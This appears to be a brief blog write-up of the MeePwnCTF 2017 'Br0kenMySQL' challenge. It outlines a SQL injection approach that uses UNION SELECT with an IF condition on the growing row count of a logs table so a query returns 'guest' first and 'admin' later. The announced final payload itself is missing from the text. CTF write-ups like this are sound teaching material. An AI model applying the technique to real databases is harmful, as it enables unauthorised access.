Press "Enter" to skip to content

[MeePwnCTF2017] Br0kenMySQL



So, the task is we have to set the $row["username"] to 'guest' in first query. But in the second query, we have to make it equals to 'admin'. Because of each time of guest query, it will add one new record into logs table. I think we can have make a use of it.

1.We have to count the number of rows in logs table without using count funciton.

2.We have to use if funciton in the union select query

If we change 1=1 to 1=2 , the username will be equals to 'guest'

3. According to the number of rows in logs table, we can make a query to check is the number are equals something than output something.
Here is our final payload:

and have few times of refresh we finally get the flag.


Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *